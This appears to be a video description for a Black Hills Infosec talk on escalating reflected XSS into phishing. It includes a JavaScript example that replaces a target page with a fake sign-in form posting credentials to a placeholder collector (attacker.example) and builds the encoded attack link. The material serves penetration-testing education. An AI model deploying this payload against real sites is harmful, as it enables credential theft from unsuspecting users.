A Journey from Alert1 to P1: Cat Pic Graffiti and Phishing Payloads | Cary Hooper
🔗 Join us in-person and virtually at our Wild West Hackin' Fest: information security conferences — https://wildwesthackinfest.com/
🔗 Register for Infosec Webcasts, Anti-casts & Summits: https://poweredbybhis.com

Tired of taking screenshots of alert boxes? Join me for a working session to discuss how to use JavaScript and DOM manipulation to craft a believable XSS phishing payload resulting in code execution in a target domain. Today, I am hosting a learning session to show an approach for turning a reflected XSS bug from alert(1) to P1. This includes a live demo / working session to turn a target domain into a phishing page (and maybe some cat pics) and a discussion about how to turn that into a shell. Attendees are encouraged to follow along in their browsers. Following this session, you will emerge with additional knowledge of (1) manipulating the browser's DOM with JS, (2) CSP limitations (and bypasses), and (3) a methodology for how to turn XSS into a phishing payload from scratch.

🔗 Cary's GitHub (slides, CyberChef recipes, etc.): https://github.com/caryhooper/present...
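The description above names the two mechanics the session is built around: rewriting the target page's DOM from injected JavaScript, and URL-encoding that payload so it survives being reflected. The following is an added example written for this page, not code from the talk, the slides or Cary's GitHub. It is Node-runnable: `buildDomPayload` produces a DOMContentLoaded-gated script that swaps the page body for a credential form, and `parseQuery` stands in for the target server's own query-string parser so the encoded and raw versions of the link can be compared. `target.example`, `attacker.example`, the `q` parameter and the form markup are placeholders.

```javascript
// Added example, not code from the talk or from Cary Hooper's repo.
// Two things the session covers, in Node-runnable form:
//   1. the shape of a DOM-rewriting phishing payload gated on DOMContentLoaded;
//   2. why that payload must be URL-encoded before it is reflected, and how a
//      raw copy gets mangled on the way in.
// target.example / attacker.example, the `q` parameter and the form markup are
// placeholders; parseQuery stands in for the target server's own parser.

// Characters that a query-string parser treats specially. A raw payload that
// contains any of them will not arrive intact.
const QUERY_DELIMITERS = [' ', '&', '+', '#', '%'];

function delimiterCharsIn(payload) {
  return QUERY_DELIMITERS.filter((ch) => payload.includes(ch));
}

// Minimal server-side query parser: split on '&', then on the first '=',
// treat '+' as space, percent-decode. This mirrors common framework behaviour.
function parseQuery(search) {
  const params = {};
  for (const pair of search.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const idx = pair.indexOf('=');
    const key = idx === -1 ? pair : pair.slice(0, idx);
    const val = idx === -1 ? '' : pair.slice(idx + 1);
    params[decodeURIComponent(key.replace(/\+/g, ' '))] =
      decodeURIComponent(val.replace(/\+/g, ' '));
  }
  return params;
}

// Script body to inject: wait for the real page to finish rendering, then
// replace its content with a credential form that posts to collectUrl.
function buildDomPayload(collectUrl) {
  return [
    "document.addEventListener('DOMContentLoaded',function(){",
    "var f=document.createElement('form');",
    "f.method='POST';f.action='" + collectUrl + "';",
    "f.innerHTML='<h2>Session expired, please sign in again</h2>'+",
    "'<input name=\"user\" placeholder=\"Username\">'+",
    "'<input name=\"pass\" type=\"password\" placeholder=\"Password\">'+",
    "'<button>Sign in</button>';",
    "document.body.replaceChildren(f);",
    "});",
  ].join('');
}

// For a sink that reflects the parameter straight into the HTML body.
function buildReflectedPayload(collectUrl) {
  return '<script>' + buildDomPayload(collectUrl) + '</script>';
}

// Build the link a victim would click. encoded=false reproduces the classic
// failure: '+' turns into a space and the first '&' ends the parameter.
function buildAttackUrl(base, param, payload, encoded) {
  const value = encoded ? encodeURIComponent(payload) : payload;
  return base + '?' + param + '=' + value;
}

// What the vulnerable server sees for `param` after parsing the URL.
function reflectedValue(url, param) {
  return parseQuery(url.slice(url.indexOf('?')))[param];
}
```

Run `reflectedValue` on both forms of the link to see the difference the talk's "Failure and investigation" and "Re-URL Encode" chapters walk through: the raw link is cut at the first `&` inside the payload and its `+` concatenations become spaces, while the encoded link round-trips to the exact script. The session does this encoding step in CyberChef; `encodeURIComponent` is the in-browser equivalent. If the target sends a Content-Security-Policy without `'unsafe-inline'`, an inline `<script>` like this is blocked outright, which is where the CSP limitations and bypasses section of the talk applies.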
00:00 - Welcome, intro
00:22 - Preview / Level Set
00:50 - We'll be cloning a website
01:19 - Disclaimer
01:33 - Agenda
01:43 - Whoami
02:28 - Alert box is not enough - need POC
04:59 - alert(1) does not communicate the true risk
05:46 - What to do with XSS besides popping an alert box
07:28 - JS DOM injection
09:02 - DEMO intro
09:30 - XSS Example
12:49 - Career Opportunities Available
13:53 - Attack Tools
15:22 - Why users trust cloned sites
16:30 - Everything can be an API if you try hard enough
17:09 - Infra diagram of attack
17:39 - Social Engineering Toolkit (SET)
18:11 - DEMO: SET
19:08 - Limitations
20:08 - root-me.org
20:46 - Easy stuff is likely to get you caught
21:29 - Content Security Policy (CSP)
22:08 - TOOL: CSP Bypass
24:00 - Other cool tricks
24:37 - DOMContentLoaded event
25:02 - DEMO
26:34 - Cleaning up with CyberChef
28:15 - Troubleshooting page appearance
34:22 - URL Encoding - why and how
36:06 - Failure and investigation
36:32 - Crowdsourced solution
37:22 - Re-URL Encode
37:44 - SUCCESS!
38:53 - Detections
42:15 - Summary
43:36 - Career Opportunities Available
43:50 - Q&A - Resources for beginning web app pentesters?
44:45 - Q&A - Why do manual URL encoding with CyberChef?
45:11 - Q&A - Where to get CyberChef recipes? Git.

///Black Hills Infosec Socials
Twitter: / bhinfosecurity
Mastodon: https://infosec.exchange/@blackhillsi...
LinkedIn: / antisyphon-training
Discord: / discord

///Black Hills Infosec Shirts & Hoodies
https://spearphish-general-store.mysh...

///Black Hills Infosec Services
Active SOC: https://www.blackhillsinfosec.com/ser...
Penetration Testing: https://www.blackhillsinfosec.com/ser...
Incident Response: https://www.blackhillsinfosec.com/ser...

///Backdoors & Breaches - Incident Response Card Game
Backdoors & Breaches: https://www.backdoorsandbreaches.com/
Play B&B Online: https://play.backdoorsandbreaches.com/

///Antisyphon Training
Pay What You Can: https://www.antisyphontraining.com/pa...
Live Training: https://www.antisyphontraining.com/co...
On Demand Training: https://www.antisyphontraining.com/on...
Antisyphon Discord: / discord
Antisyphon Mastodon: https://infosec.exchange/@Antisy_Trai...

///Educational Infosec Content
Black Hills Infosec Blogs: https://www.blackhillsinfosec.com/blog/
Wild West Hackin' Fest YouTube: / wildwesthackinfest
Antisyphon Training YouTube: / antisyphontraining
Active Countermeasures YouTube: / activecountermeasures
Threat Hunter Community Discord: / discord

Join us at the annual information security conference in Deadwood, SD (in-person and virtually) — Wild West Hackin' Fest: https://wildwesthackinfest.com/